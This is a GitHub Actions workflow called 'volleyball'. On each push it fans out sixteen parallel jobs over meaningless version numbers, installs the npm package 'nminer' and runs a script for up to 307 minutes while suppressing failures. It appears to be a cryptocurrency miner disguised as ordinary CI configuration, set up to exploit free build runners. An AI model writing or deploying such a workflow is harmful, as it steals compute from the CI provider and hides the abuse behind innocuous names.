name: volleyball
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8448 }
          - { version: 3131 }
          - { version: 6924 }
          - { version: 5041 }
          - { version: 4043 }
          - { version: 3599 }
          - { version: 8323 }
          - { version: 7817 }
          - { version: 7764 }
          - { version: 5103 }
          - { version: 1561 }
          - { version: 6479 }
          - { version: 1858 }
          - { version: 8802 }
          - { version: 6312 }
          - { version: 3510 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: grown
        run: |
          npm install nminer@latest
          timeout 307m node volleyball.js || echo "volleyball executed"